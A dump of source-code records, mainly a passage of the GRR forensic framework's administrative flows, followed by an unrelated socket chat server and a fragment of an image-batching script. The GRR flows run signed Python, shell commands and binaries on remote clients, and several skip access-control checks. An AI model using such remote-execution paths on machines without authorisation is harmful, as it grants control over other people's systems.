collections\nfrom grr.lib.aff4_objects import reports\nfrom grr.proto import flows_pb2\n\n\nclass AdministrativeInit(registry.InitHook):\n \"\"\"Initialize the Django environment.\"\"\"\n\n pre = [\"StatsInit\"]\n\n def RunOnce(self):\n stats.STATS.RegisterCounterMetric(\"grr_client_crashes\")\n\n\nclass ClientCrashEventListener(flow.EventListener):\n \"\"\"EventListener with additional helper methods to save crash details.\"\"\"\n\n def _AppendCrashDetails(self, path, crash_details):\n collection = aff4.FACTORY.Create(\n path, \"PackedVersionedCollection\", mode=\"rw\", token=self.token)\n\n collection.Add(crash_details)\n collection.Close(sync=False)\n\n def WriteAllCrashDetails(self, client_id, crash_details,\n flow_session_id=None, hunt_session_id=None):\n # Update last crash attribute of the client.\n client_obj = aff4.FACTORY.Create(client_id, \"VFSGRRClient\",\n token=self.token)\n client_obj.Set(client_obj.Schema.LAST_CRASH(crash_details))\n client_obj.Close(sync=False)\n\n # Duplicate the crash information in a number of places so we can find it\n # easily.\n self._AppendCrashDetails(client_id.Add(\"crashes\"), crash_details)\n self._AppendCrashDetails(aff4.ROOT_URN.Add(\"crashes\"), crash_details)\n\n if flow_session_id:\n aff4_flow = aff4.FACTORY.Open(flow_session_id, \"GRRFlow\", mode=\"rw\",\n age=aff4.NEWEST_TIME, token=self.token)\n\n aff4_flow.Set(aff4_flow.Schema.CLIENT_CRASH(crash_details))\n aff4_flow.Close(sync=False)\n\n hunt_str, hunt_id, _ = flow_session_id.Split(3)\n if hunt_str == \"hunts\":\n hunt_session_id = aff4.ROOT_URN.Add(\"hunts\").Add(hunt_id)\n if hunt_session_id != flow_session_id:\n self._AppendCrashDetails(\n hunt_session_id.Add(\"crashes\"), crash_details)\n\n\nclass GetClientStatsProcessResponseMixin(object):\n \"\"\"Mixin defining ProcessReponse() that writes client stats to datastore.\"\"\"\n\n def ProcessResponse(self, client_id, response):\n \"\"\"Actually processes the contents of the response.\"\"\"\n urn = client_id.Add(\"stats\")\n\n with aff4.FACTORY.Create(urn, \"ClientStats\", token=self.token,\n mode=\"w\") as stats_fd:\n # Only keep the average of all values that fall within one minute.\n stats_fd.AddAttribute(stats_fd.Schema.STATS(response.DownSample()))\n\n\nclass GetClientStats(flow.GRRFlow, GetClientStatsProcessResponseMixin):\n \"\"\"This flow retrieves information about the GRR client process.\"\"\"\n\n category = \"/Administrative/\"\n\n @flow.StateHandler(next_state=[\"StoreResults\"])\n def Start(self):\n self.CallClient(\"GetClientStats\", next_state=\"StoreResults\")\n\n @flow.StateHandler()\n def StoreResults(self, responses):\n \"\"\"Stores the responses.\"\"\"\n\n if not responses.success:\n self.Error(\"Failed to retrieve client stats.\")\n return\n\n for response in responses:\n self.ProcessResponse(self.client_id, response)\n\n\nclass GetClientStatsAuto(flow.WellKnownFlow,\n GetClientStatsProcessResponseMixin):\n \"\"\"This action pushes client stats to the server automatically.\"\"\"\n\n category = None\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Stats\")\n\n def ProcessMessage(self, message):\n \"\"\"Processes a stats response from the client.\"\"\"\n client_stats = rdfvalue.ClientStats(message.args)\n self.ProcessResponse(message.source, client_stats)\n\n\nclass DeleteGRRTempFilesArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.DeleteGRRTempFilesArgs\n\n\nclass DeleteGRRTempFiles(flow.GRRFlow):\n \"\"\"Delete all the GRR temp files in path.\n\n If path is a directory, look in the top level for 
filenames beginning with\n Client.tempfile_prefix, and delete them.\n\n If path is a regular file and starts with Client.tempfile_prefix, delete it.\n \"\"\"\n\n category = \"/Administrative/\"\n args_type = DeleteGRRTempFilesArgs\n\n @flow.StateHandler(next_state=\"Done\")\n def Start(self):\n \"\"\"Issue a request to delete tempfiles in directory.\"\"\"\n self.CallClient(\"DeleteGRRTempFiles\", self.args.pathspec,\n next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self, responses):\n if not responses.success:\n raise flow.FlowError(str(responses.status))\n\n for response in responses:\n self.Log(response.data)\n\n\nclass UninstallArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UninstallArgs\n\n\nclass Uninstall(flow.GRRFlow):\n \"\"\"Removes the persistence mechanism which the client uses at boot.\n\n For Windows and OSX, this will disable the service, and then stop the service.\n For Linux this flow will fail as we haven't implemented it yet :)\n \"\"\"\n\n category = \"/Administrative/\"\n args_type = UninstallArgs\n\n @flow.StateHandler(next_state=[\"Kill\"])\n def Start(self):\n \"\"\"Start the flow and determine OS support.\"\"\"\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n system = client.Get(client.Schema.SYSTEM)\n\n if system == \"Darwin\" or system == \"Windows\":\n self.CallClient(\"Uninstall\", next_state=\"Kill\")\n else:\n self.Log(\"Unsupported platform for Uninstall\")\n\n @flow.StateHandler(next_state=\"Confirmation\")\n def Kill(self, responses):\n \"\"\"Call the kill function on the client.\"\"\"\n if not responses.success:\n self.Log(\"Failed to uninstall client.\")\n elif self.args.kill:\n self.CallClient(\"Kill\", next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation of kill.\"\"\"\n if not responses.success:\n self.Log(\"Kill failed on the client.\")\n\n\nclass Kill(flow.GRRFlow):\n \"\"\"Terminate a running client (does not disable, just kill).\"\"\"\n\n category = \"/Administrative/\"\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the kill function on the client.\"\"\"\n self.CallClient(\"Kill\", next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation of kill.\"\"\"\n if not responses.success:\n self.Log(\"Kill failed on the client.\")\n\n\nclass UpdateConfigurationArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UpdateConfigurationArgs\n\n\nclass UpdateConfiguration(flow.GRRFlow):\n \"\"\"Update the configuration of the client.\n\n Note: This flow is somewhat dangerous, so we don't expose it in the UI.\n \"\"\"\n\n # Still accessible (e.g. via ajax but not visible in the UI.)\n category = None\n args_type = rdfvalue.UpdateConfigurationArgs\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the UpdateConfiguration function on the client.\"\"\"\n self.CallClient(\"UpdateConfiguration\", request=self.args.config,\n next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation.\"\"\"\n if not responses.success:\n raise flow.FlowError(\"Failed to write config. 
Err: {0}\".format(\n responses.status))\n\n\nclass ExecutePythonHackArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ExecutePythonHackArgs\n\n\nclass ExecutePythonHack(flow.GRRFlow):\n \"\"\"Execute a signed python hack on a client.\"\"\"\n\n category = \"/Administrative/\"\n args_type = ExecutePythonHackArgs\n\n @flow.StateHandler(next_state=[\"Done\"])\n def Start(self):\n python_hack_root_urn = config_lib.CONFIG.Get(\"Config.python_hack_root\")\n fd = aff4.FACTORY.Open(python_hack_root_urn.Add(self.args.hack_name),\n token=self.token)\n\n if not isinstance(fd, aff4.GRRSignedBlob):\n raise RuntimeError(\"Python hack %s not found.\" % self.args.hack_name)\n\n # TODO(user): This will break if someone wants to execute lots of Python.\n for python_blob in fd:\n self.CallClient(\"ExecutePython\", python_code=python_blob,\n py_args=self.args.py_args, next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self, responses):\n response = responses.First()\n if not responses.success:\n raise flow.FlowError(\"Execute Python hack failed: %s\" % responses.status)\n if response:\n result = utils.SmartStr(response.return_val)\n # Send reply with full data, but only log the first 200 bytes.\n str_result = result[0:200]\n if len(result) >= 200:\n str_result += \"...[truncated]\"\n self.Log(\"Result: %s\" % str_result)\n self.SendReply(rdfvalue.RDFBytes(utils.SmartStr(response.return_val)))\n\n\nclass ExecuteCommandArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ExecuteCommandArgs\n\n\nclass ExecuteCommand(flow.GRRFlow):\n \"\"\"Execute a predefined command on the client.\"\"\"\n\n args_type = ExecuteCommandArgs\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the execute function on the client.\"\"\"\n self.CallClient(\"ExecuteCommand\", cmd=self.args.cmd,\n args=shlex.split(self.args.command_line),\n time_limit=self.args.time_limit, next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation.\"\"\"\n if responses.success:\n response = responses.First()\n self.Log((\"Execution of %s %s (return value %d, \"\n \"ran for %f seconds):\"),\n response.request.cmd,\n \" \".join(response.request.command_line),\n response.exit_status,\n # time_used is returned in microseconds.\n response.time_used / 1e6)\n try:\n # We don't want to overflow the log so we just save 100 bytes each.\n logout = response.stdout[:100]\n if len(response.stdout) > 100:\n logout += \"...\"\n logerr = response.stderr[:100]\n if len(response.stderr) > 100:\n logerr += \"...\"\n self.Log(\"Output: %s, %s\", logout, logerr)\n except ValueError:\n # The received byte buffer does not convert to unicode.\n self.Log(\"Received output not convertible to unicode.\")\n else:\n self.Log(\"Execute failed.\")\n\n\nclass Foreman(flow.WellKnownFlow):\n \"\"\"The foreman assigns new flows to clients based on their type.\n\n Clients periodically call the foreman flow to ask for new flows that might be\n scheduled for them based on their types. 
This allows the server to schedule\n flows for entire classes of machines based on certain criteria.\n \"\"\"\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Foreman\")\n foreman_cache = None\n\n # How often we refresh the rule set from the data store.\n cache_refresh_time = 60\n\n lock = threading.Lock()\n\n def ProcessMessage(self, message):\n \"\"\"Run the foreman on the client.\"\"\"\n # Only accept authenticated messages\n if (message.auth_state !=\n rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED):\n return\n\n now = time.time()\n\n # Maintain a cache of the foreman\n with self.lock:\n if (self.foreman_cache is None or\n now > self.foreman_cache.age + self.cache_refresh_time):\n self.foreman_cache = aff4.FACTORY.Open(\"aff4:/foreman\", mode=\"rw\",\n token=self.token)\n self.foreman_cache.age = now\n\n if message.source:\n self.foreman_cache.AssignTasksToClient(message.source)\n\n\nclass OnlineNotificationArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.OnlineNotificationArgs\n\n\nclass OnlineNotification(flow.GRRFlow):\n \"\"\"Notifies by email when a client comes online in GRR.\"\"\"\n\n category = \"/Administrative/\"\n behaviours = flow.GRRFlow.behaviours + \"BASIC\"\n\n template = \"\"\"\n
<html><body><h1>GRR Client Online Notification.</h1>\n\n<p>\n  Client %(client_id)s (%(hostname)s) just came online. Click\n  <a href='%(admin_ui)s/#%(urn)s'> here </a> to access this machine.\n  <br />This notification was created by %(creator)s.\n</p>\n\n<p>Thanks,</p>\n\n<p>%(signature)s</p>\n</body></html>
\n\"\"\"\n\n args_type = OnlineNotificationArgs\n\n @classmethod\n def GetDefaultArgs(cls, token=None):\n return cls.args_type(email=\"%s@%s\" % (\n token.username, config_lib.CONFIG.Get(\"Logging.domain\")))\n\n @flow.StateHandler(next_state=\"SendMail\")\n def Start(self):\n \"\"\"Starts processing.\"\"\"\n if self.args.email is None:\n self.args.email = self.token.username\n self.CallClient(\"Echo\", data=\"Ping\", next_state=\"SendMail\")\n\n @flow.StateHandler()\n def SendMail(self, responses):\n \"\"\"Sends a mail when the client has responded.\"\"\"\n if responses.success:\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n\n url = urllib.urlencode(((\"c\", self.client_id),\n (\"main\", \"HostInformation\")))\n\n subject = \"GRR Client on %s became available.\" % hostname\n\n email_alerts.SendEmail(\n self.args.email, \"grr-noreply\",\n subject,\n self.template % dict(\n client_id=self.client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n urn=url,\n creator=self.token.username,\n signature=config_lib.CONFIG[\"Email.signature\"]),\n is_html=True)\n else:\n flow.FlowError(\"Error while pinging client.\")\n\n\nclass UpdateClientArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UpdateClientArgs\n\n\nclass UpdateClient(flow.GRRFlow):\n \"\"\"Updates the GRR client to a new version replacing the current client.\n\n This will execute the specified installer on the client and then run\n an Interrogate flow.\n\n The new installer needs to be loaded into the database, generally in\n /config/executables//installers and must be signed using the\n exec signing key.\n\n Signing and upload of the file is done with config_updater.\n \"\"\"\n\n category = \"/Administrative/\"\n\n AUTHORIZED_LABELS = [\"admin\"]\n\n system_platform_mapping = {\n \"Darwin\": \"darwin\",\n \"Linux\": \"linux\",\n \"Windows\": \"windows\"}\n\n args_type = UpdateClientArgs\n\n @flow.StateHandler(next_state=\"Interrogate\")\n def Start(self):\n \"\"\"Start.\"\"\"\n blob_path = self.args.blob_path\n if not blob_path:\n # No explicit path was given, we guess a reasonable default here.\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n client_platform = client.Get(client.Schema.SYSTEM)\n if not client_platform:\n raise RuntimeError(\"Can't determine client platform, please specify.\")\n blob_urn = \"aff4:/config/executables/%s/agentupdates\" % (\n self.system_platform_mapping[client_platform])\n blob_dir = aff4.FACTORY.Open(blob_urn, token=self.token)\n updates = sorted(list(blob_dir.ListChildren()))\n if not updates:\n raise RuntimeError(\n \"No matching updates found, please specify one manually.\")\n blob_path = updates[-1]\n\n if not (\"windows\" in utils.SmartStr(self.args.blob_path) or\n \"darwin\" in utils.SmartStr(self.args.blob_path) or\n \"linux\" in utils.SmartStr(self.args.blob_path)):\n raise RuntimeError(\"Update not supported for this urn, use aff4:/config\"\n \"/executables//agentupdates/\")\n\n aff4_blobs = aff4.FACTORY.Open(blob_path, token=self.token)\n offset = 0\n write_path = \"%d\" % time.time()\n for i, blob in enumerate(aff4_blobs):\n self.CallClient(\n \"UpdateAgent\", executable=blob, more_data=i < aff4_blobs.chunks-1,\n offset=offset, write_path=write_path, next_state=\"Interrogate\")\n\n offset += len(blob.data)\n\n @flow.StateHandler(next_state=\"Done\")\n def Interrogate(self, responses):\n if not responses.success:\n self.Log(\"Installer reported an error: %s\" % responses.status)\n 
else:\n self.Log(\"Installer completed.\")\n self.CallFlow(\"Interrogate\", next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self):\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n info = client.Get(client.Schema.CLIENT_INFO)\n self.Log(\"Client update completed, new version: %s\" %\n info.client_version)\n\n\nclass NannyMessageHandler(ClientCrashEventListener):\n \"\"\"A listener for nanny messages.\"\"\"\n EVENTS = [\"NannyMessage\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:NannyMessage\")\n\n mail_template = \"\"\"\n
<html><body><h1>GRR nanny message received.</h1>\n\nThe nanny for client %(client_id)s (%(hostname)s) just sent a message:<br>\n<br>\n%(message)s\n<br>\nClick <a href='%(admin_ui)s/#%(urn)s'> here </a> to access this machine.\n\n<p>%(signature)s</p>\n</body></html>
\n\n\"\"\"\n\n subject = \"GRR nanny message received from %s.\"\n\n logline = \"Nanny for client %s sent: %s\"\n\n @flow.EventHandler(allow_client_access=True)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Processes this event.\"\"\"\n _ = event\n\n client_id = message.source\n\n message = rdfvalue.DataBlob(message.args).string\n\n logging.info(self.logline, client_id, message)\n\n # Write crash data to AFF4.\n client = aff4.FACTORY.Open(client_id, token=self.token)\n client_info = client.Get(client.Schema.CLIENT_INFO)\n\n crash_details = rdfvalue.ClientCrash(\n client_id=client_id, client_info=client_info,\n crash_message=message, timestamp=long(time.time() * 1e6),\n crash_type=self.well_known_session_id)\n\n self.WriteAllCrashDetails(client_id, crash_details)\n\n # Also send email.\n if config_lib.CONFIG[\"Monitoring.alert_email\"]:\n client = aff4.FACTORY.Open(client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n url = urllib.urlencode(((\"c\", client_id),\n (\"main\", \"HostInformation\")))\n\n email_alerts.SendEmail(\n config_lib.CONFIG[\"Monitoring.alert_email\"],\n \"GRR server\",\n self.subject % client_id,\n self.mail_template % dict(\n client_id=client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n signature=config_lib.CONFIG[\"Email.signature\"],\n urn=url,\n message=message),\n is_html=True)\n\n\nclass ClientAlertHandler(NannyMessageHandler):\n \"\"\"A listener for client messages.\"\"\"\n EVENTS = [\"ClientAlert\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:ClientAlert\")\n\n mail_template = \"\"\"\n
<html><body><h1>GRR client message received.</h1>\n\nThe client %(client_id)s (%(hostname)s) just sent a message:<br>\n<br>\n%(message)s\n<br>\nClick <a href='%(admin_ui)s/#%(urn)s'> here </a> to access this machine.\n\n<p>%(signature)s</p>\n</body></html>
\n\n\"\"\"\n\n subject = \"GRR client message received from %s.\"\n\n logline = \"Client message from %s: %s\"\n\n\nclass ClientCrashHandler(ClientCrashEventListener):\n \"\"\"A listener for client crashes.\"\"\"\n EVENTS = [\"ClientCrash\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:CrashHandler\")\n\n mail_template = \"\"\"\n
<html><body><h1>GRR client crash report.</h1>\n\nClient %(client_id)s (%(hostname)s) just crashed while executing an action.\nClick <a href='%(admin_ui)s/#%(urn)s'> here </a> to access this machine.\n\n<p>Thanks,</p>\n\n<p>%(signature)s</p>
\nP.S. The state of the failing flow was:\n%(state)s\n\n%(nanny_msg)s\n\n\"\"\"\n\n @flow.EventHandler(allow_client_access=True)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Processes this event.\"\"\"\n _ = event\n client_id = message.source\n nanny_msg = \"\"\n\n flow_obj = aff4.FACTORY.Open(message.session_id, token=self.token)\n\n # Log.\n logging.info(\"Client crash reported, client %s.\", client_id)\n\n # Export.\n stats.STATS.IncrementCounter(\"grr_client_crashes\")\n\n # Write crash data to AFF4.\n client = aff4.FACTORY.Open(client_id, token=self.token)\n client_info = client.Get(client.Schema.CLIENT_INFO)\n\n status = rdfvalue.GrrStatus(message.args)\n crash_details = rdfvalue.ClientCrash(\n client_id=client_id, session_id=message.session_id,\n client_info=client_info, crash_message=status.error_message,\n timestamp=rdfvalue.RDFDatetime().Now(),\n crash_type=self.well_known_session_id)\n\n self.WriteAllCrashDetails(client_id, crash_details,\n flow_session_id=message.session_id)\n\n # Also send email.\n if config_lib.CONFIG[\"Monitoring.alert_email\"]:\n if status.nanny_status:\n nanny_msg = \"Nanny status: %s\" % status.nanny_status\n\n client = aff4.FACTORY.Open(client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n url = urllib.urlencode(((\"c\", client_id),\n (\"main\", \"HostInformation\")))\n\n renderer = rendering.FindRendererForObject(flow_obj.state)\n\n email_alerts.SendEmail(\n config_lib.CONFIG[\"Monitoring.alert_email\"],\n \"GRR server\",\n \"Client %s reported a crash.\" % client_id,\n self.mail_template % dict(\n client_id=client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n state=renderer.RawHTML(),\n urn=url,\n nanny_msg=nanny_msg,\n signature=config_lib.CONFIG[\"Email.signature\"]\n ),\n is_html=True)\n\n if nanny_msg:\n msg = \"Client crashed, \" + nanny_msg\n else:\n msg = \"Client crashed.\"\n\n # Now terminate the flow.\n flow.GRRFlow.TerminateFlow(message.session_id, reason=msg,\n token=self.token, force=True)\n\n\nclass ClientStartupHandler(flow.EventListener):\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Startup\")\n\n @flow.EventHandler(allow_client_access=True, auth_required=False)\n def ProcessMessage(self, message=None, event=None):\n \"\"\"Handle a startup event.\"\"\"\n _ = event\n # We accept unauthenticated messages so there are no errors but we don't\n # store the results.\n if (message.auth_state !=\n rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED):\n return\n\n client_id = message.source\n\n client = aff4.FACTORY.Create(client_id, \"VFSGRRClient\", mode=\"rw\",\n token=self.token)\n old_info = client.Get(client.Schema.CLIENT_INFO)\n old_boot = client.Get(client.Schema.LAST_BOOT_TIME, 0)\n startup_info = rdfvalue.StartupInfo(message.args)\n info = startup_info.client_info\n\n # Only write to the datastore if we have new information.\n new_data = (info.client_name, info.client_version, info.revision,\n info.build_time, info.client_description)\n old_data = (old_info.client_name, old_info.client_version,\n old_info.revision, old_info.build_time,\n old_info.client_description)\n\n if new_data != old_data:\n client.Set(client.Schema.CLIENT_INFO(info))\n\n client.AddLabels(*info.labels, owner=\"GRR\")\n\n # Allow for some drift in the boot times (5 minutes).\n if abs(int(old_boot) - int(startup_info.boot_time)) > 300 * 1e6:\n client.Set(client.Schema.LAST_BOOT_TIME(startup_info.boot_time))\n\n client.Close()\n\n flow.Events.PublishEventInline(\"ClientStartup\", 
message, token=self.token)\n\n\nclass IgnoreResponses(flow.WellKnownFlow):\n \"\"\"This flow exists so other well known flows can delegate their responses.\"\"\"\n\n category = None\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:DevNull\")\n\n def ProcessMessage(self, message):\n pass\n\n\nclass KeepAliveArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.KeepAliveArgs\n\n\nclass KeepAlive(flow.GRRFlow):\n \"\"\"Requests that the clients stays alive for a period of time.\"\"\"\n\n # We already want to run this flow while waiting for a client approval.\n # Note that this can potentially be abused to launch a DDOS attack against\n # the frontend server(s) by putting all clients into fastpoll mode. The load\n # of idle polling messages is not that high though and this can only be done\n # by users that have a GRR account already so the risk is acceptable.\n ACL_ENFORCED = False\n\n category = \"/Administrative/\"\n behaviours = flow.GRRFlow.behaviours + \"BASIC\"\n\n sleep_time = 60\n args_type = KeepAliveArgs\n\n @flow.StateHandler(next_state=\"SendMessage\")\n def Start(self):\n self.state.Register(\"end_time\", self.args.duration.Expiry())\n self.CallState(next_state=\"SendMessage\")\n\n @flow.StateHandler(next_state=\"Sleep\")\n def SendMessage(self, responses):\n if not responses.success:\n self.Log(responses.status.error_message)\n raise flow.FlowError(responses.status.error_message)\n\n self.CallClient(\"Echo\", data=\"Wake up!\", next_state=\"Sleep\")\n\n @flow.StateHandler(next_state=\"SendMessage\")\n def Sleep(self, responses):\n if not responses.success:\n self.Log(responses.status.error_message)\n raise flow.FlowError(responses.status.error_message)\n\n if rdfvalue.RDFDatetime().Now() < self.state.end_time - self.sleep_time:\n start_time = rdfvalue.RDFDatetime().Now() + self.sleep_time\n self.CallState(next_state=\"SendMessage\", start_time=start_time)\n\n\nclass TerminateFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.TerminateFlowArgs\n\n\nclass TerminateFlow(flow.GRRFlow):\n \"\"\"Terminate a flow with a given URN.\"\"\"\n # This flow can run on any client without ACL enforcement (an SUID flow).\n ACL_ENFORCED = False\n args_type = TerminateFlowArgs\n\n @flow.StateHandler()\n def Start(self):\n \"\"\"Terminate a flow. 
User has to have access to the flow.\"\"\"\n # We have to create special token here, because within the flow\n # token has supervisor access.\n check_token = access_control.ACLToken(username=self.token.username,\n reason=self.token.reason)\n # If we can read the flow, we're allowed to terminate it.\n data_store.DB.security_manager.CheckDataStoreAccess(\n check_token, [self.args.flow_urn], \"r\")\n\n flow.GRRFlow.TerminateFlow(self.args.flow_urn,\n reason=self.args.reason,\n token=self.token, force=True)\n\n\nclass LaunchBinaryArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.LaunchBinaryArgs\n\n\nclass LaunchBinary(flow.GRRFlow):\n \"\"\"Launch a signed binary on a client.\"\"\"\n\n category = \"/Administrative/\"\n\n AUTHORIZED_LABELS = [\"admin\"]\n args_type = LaunchBinaryArgs\n\n @flow.StateHandler(next_state=[\"End\"])\n def Start(self):\n fd = aff4.FACTORY.Open(self.args.binary, token=self.token)\n if not isinstance(fd, collections.GRRSignedBlob):\n raise RuntimeError(\"Executable binary %s not found.\" % self.args.binary)\n\n offset = 0\n write_path = \"%d\" % time.time()\n for i, blob in enumerate(fd):\n self.CallClient(\n \"ExecuteBinaryCommand\", executable=blob, more_data=i < fd.chunks-1,\n args=shlex.split(self.args.command_line), offset=offset,\n write_path=write_path, next_state=\"End\")\n\n offset += len(blob.data)\n\n def _TruncateResult(self, data):\n if len(data) > 2000:\n result = data[:2000] + \"... [truncated]\"\n else:\n result = data\n\n return result\n\n @flow.StateHandler()\n def End(self, responses):\n if not responses.success:\n raise IOError(responses.status)\n\n response = responses.First()\n if response:\n self.Log(\"Stdout: %s\" % self._TruncateResult(response.stdout))\n self.Log(\"Stderr: %s\" % self._TruncateResult(response.stderr))\n\n self.SendReply(response)\n\n\nclass RunReportFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.RunReportFlowArgs\n\n\nclass RunReport(flow.GRRGlobalFlow):\n \"\"\"Run a report and send the result via email.\"\"\"\n\n category = \"/Reporting/\"\n\n args_type = RunReportFlowArgs\n behaviours = flow.GRRGlobalFlow.behaviours + \"BASIC\"\n\n ACL_ENFORCED = False\n\n # Only admins are allows to run reports.\n AUTHORIZED_LABELS = [\"admin\"]\n\n @flow.StateHandler(next_state=\"RunReport\")\n def Start(self):\n if self.state.args.report_name not in reports.Report.classes:\n raise flow.FlowError(\"No such report %s\" % self.state.args.report_name)\n else:\n self.CallState(next_state=\"RunReport\")\n\n @flow.StateHandler(next_state=\"EmailReport\")\n def RunReport(self):\n \"\"\"Run the report.\"\"\"\n report_cls = reports.Report.GetPlugin(self.state.args.report_name)\n report_obj = report_cls(token=self.token)\n report_obj.Run()\n report_obj.MailReport(self.state.args.email)\n\n\nclass ApplyLabelsToClientsFlowArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ApplyLabelsToClientsFlowArgs\n\n\nclass ApplyLabelsToClientsFlow(flow.GRRGlobalFlow):\n\n args_type = ApplyLabelsToClientsFlowArgs\n\n ACL_ENFORCED = False\n\n @flow.StateHandler()\n def Start(self):\n audit_description = \",\".join([self.token.username + \".\" + name\n for name in self.args.labels])\n audit_events = []\n try:\n client_objs = aff4.FACTORY.MultiOpen(\n self.args.clients, aff4_type=\"VFSGRRClient\", mode=\"rw\",\n token=self.token)\n for client_obj in client_objs:\n client_obj.AddLabels(*self.args.labels)\n client_obj.Close()\n\n audit_events.append(\n rdfvalue.AuditEvent(user=self.token.username,\n action=\"CLIENT_ADD_LABEL\",\n 
flow_name=\"ApplyLabelsToClientsFlow\",\n client=client_obj.urn,\n description=audit_description))\n finally:\n flow.Events.PublishMultipleEvents({\"Audit\": audit_events},\n token=self.token)\n","repo_name":"ForensicTools/GRREAT-475_2141-Chaigon-Failey-Siebert","sub_path":"lib/flows/general/administrative.py","file_name":"administrative.py","file_ext":"py","file_size_in_byte":29876,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"41425979479","text":"\nimport socket\n\nmyFirstSocket = socket.socket()\nmyFirstSocket.bind((\"\", 50000))\nmyFirstSocket.listen(1)\n\nwhile True:\n clientSocket, clientAdres = myFirstSocket.accept()\n messageSend = input(\"Введите сообщение: \")\n if messageSend == 'by by':\n break\n clientSocket.sendall(messageSend.encode(encoding=\"utf-8\"))\n\n while True:\n data = clientSocket.recv(1024)\n receivedMsg = data.decode(encoding=\"utf-8\")\n print(receivedMsg)\n\n\nclientSocket.close() \n\n\n","repo_name":"Allex413/homeNetwork1","sub_path":"HomeWork_Network1/homeServer.py","file_name":"homeServer.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"24173814964","text":"import logging\n\nimport argparse as argp\nimport functools\nfrom glob import glob\nimport gzip\nimport imgworker\nfrom multiprocessing import Pool\nimport numpy as np\nimport os\nimport sys\nimport tarfile\nfrom time import time\nimport yaml\n\nfrom neon.util.compat import range, StringIO\nfrom neon.util.param import opt_param\nfrom neon.util.persist import serialize\n\nTARGET_SIZE = None\nSQUARE_CROP = True\n\nlogger = logging.getLogger(__name__)\n\n\n# NOTE: We have to leave this helper function out of the class and use the\n# global variable hack so that we can use multiprocess pool.map\ndef proc_img(imgfile, is_string=False):\n from PIL import Image\n if is_string:\n imgfile = StringIO(imgfile)\n im = Image.open(imgfile)\n\n # This part does the processing\n scale_factor = TARGET_SIZE / np.float32(min(im.size))\n (wnew, hnew) = map(lambda x: int(round(scale_factor * x)), im.size)\n if scale_factor != 1:\n filt = Image.BICUBIC if scale_factor > 1 else Image.ANTIALIAS\n im = im.resize((wnew, hnew), filt)\n\n if SQUARE_CROP is True:\n (cx, cy) = map(lambda x: (x - TARGET_SIZE) / 2, (wnew, hnew))\n im = im.crop((cx, cy, cx+TARGET_SIZE, cy+TARGET_SIZE))\n\n buf = StringIO()\n im.save(buf, format='JPEG')\n return buf.getvalue()\n\n\nclass BatchWriter(object):\n\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n self.out_dir = os.path.expanduser(self.save_dir)\n self.in_dir = os.path.expanduser(self.image_dir)\n self.batch_size = self.macro_size\n global TARGET_SIZE, SQUARE_CROP\n TARGET_SIZE = self.output_image_size\n SQUARE_CROP = self.square_crop\n opt_param(self, ['file_pattern'], '*.jpg')\n opt_param(self, ['validation_pct'], 0.2)\n opt_param(self, ['num_workers'], 5)\n opt_param(self, ['class_samples_max'])\n self.train_file = os.path.join(self.out_dir, 'train_file.csv.gz')\n self.val_file = os.path.join(self.out_dir, 'val_file.csv.gz')\n self.stats = os.path.join(self.out_dir, 'dataset_cache.pkl')\n self.val_mean = np.zeros((self.output_image_size,\n self.output_image_size,\n self.num_channels), dtype=np.uint8)\n self.train_mean = np.zeros((self.output_image_size,\n self.output_image_size,\n self.num_channels), 